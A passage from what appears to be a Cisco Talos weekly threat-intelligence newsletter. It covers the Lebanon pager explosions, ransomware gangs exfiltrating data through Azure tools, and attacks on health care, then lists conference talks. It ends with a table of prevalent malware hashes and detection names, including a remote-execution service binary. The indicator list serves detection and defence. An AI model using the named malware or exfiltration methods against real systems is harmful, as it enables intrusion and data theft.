For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Top security headlines of the week **

**Experts and governments are still unpacking a wave of pager and handheld radio explosions in the Middle East.** The attacks appeared to target members of the armed group Hezbollah in Lebanon when hundreds of devices exploded simultaneously on Tuesday, killing multiple people. The international community has been left wondering if this was some type of cyber attack or intentional physical implants in the devices. Messages sent at the time of the attack appeared to come from Hezbollah leadership but instead triggered the explosions. Most analysts are assuming that this was a hardware supply chain attack, in which the pagers were tampered with somehow during manufacturing or while they were in transit. Supply chain attacks are normally carried out at the software level. So far, no one has taken credit for the attacks, though Hezbollah is blaming Israel, one of its chief antagonists. (Reuters, BBC) 

**Ransomware gangs are increasingly leveraging Microsoft Azure to steal victims’ information and store it.** New research findings indicate that groups like BianLian and Rhysida use Microsoft's Azure Storage Explorer and AzCopy to steal data from infiltrated networks, then store it in Azure Blob storage until it can be transferred to an attacker-controlled network. Because Azure is a popular and trusted service, corporate firewalls and security tools are unlikely to block it, making the data transfers more likely to pass undetected. Potential targets that use Azure are recommended to log out of the application after each use to prevent attackers from using the active session for file theft. (Bleeping Computer, modePUSH) 

**Health care facilities and medical devices continue to be top targets for ransomware actors, and industry leaders are calling on the U.S. federal government to do more to assist them.** This year, several massive health care providers across the globe have been affected by cyber attacks, forcing countless surgeries and appointments to be rescheduled and putting sensitive medical records at risk. Past victims include Change Healthcare, Kaiser Permanente and Ascension. One health care executive told NPR that their company was still trying to calculate the financial impact of the Change attack, which paused payments from insurance for months. They are only just now being paid out for services rendered in July. U.S. Sen. Ron Wyden, the chair of the Senate Finance Committee, recently publicly called on the Health and Human Services Department to revise its current approach to cybersecurity, because the current system “is woefully inadequate and has left the health care system vulnerable to criminals and foreign government hackers.” Other experts have said that HHS has traditionally focused on physical disasters like earthquakes, storms and power outages, and not enough on cyberspace. (NPR, Security Intelligence) 

**Can’t get enough Talos? **

*   Despite Russia warnings, Western critical infrastructure remains unprepared 
*   The Cybersecurity Cat-And-Mouse Game 
*   DragonRank Manipulates SEO Rankings To Direct Users To Malicious Sites 

**Upcoming events where you can find Talos**

**VB2024** **(Oct. 2 - 4)** 

_Dublin, Ireland_ 

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**misecCON** **(Nov. 22)** 

_Lansing, Michigan_

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** b9ddbd1a4cec61e6b022a275d66312b5b676f9a0a9537a7708de9aa8ce34de59   
**MD5:** 3b100bdcd61bb1da816cd7eaf9ef13ba   
**Typical Filename:** vt-upload-C6In1   
**Claimed Product:** N/A    
**Detection Name:** Backdoor:KillAV-tpd  

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 70ff63cd695033f624a456a5c8511ce8312cffd8ac40492ffe5dc7ae18548668   
**MD5:** 49d35332a1c6fefae1d31a581a66ab46   
**Typical Filename:** 49d35332a1c6fefae1d31a581a66ab46.virus   
**Claimed Product:** N/A     
**Detection Name:** W32.Auto:70ff63.in03.Talos 

**SHA 256:** 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66   
**MD5:** 8b84d61bf3ffec822e2daf4a3665308c   
**Typical Filename:** RemComSvc.exe   
**Claimed Product:** N/A   
**Detection Name:** W32.3A2EA65FAE-95.SBX.TG 

**SHA 256:** 35dcf857f0bb2ea75bf4582b67a2a72d7e21d96562b4c8a61b5d598bd2327c2c   
**MD5:** fab8aabfdabe44c9a1ffa779fda207db   
**Typical Filename:** ACenter.exe   
**Claimed Product:** Aranda AGENT   
**Detection Name:** Win.Trojan.Generic::tg.talos

Tag

#mac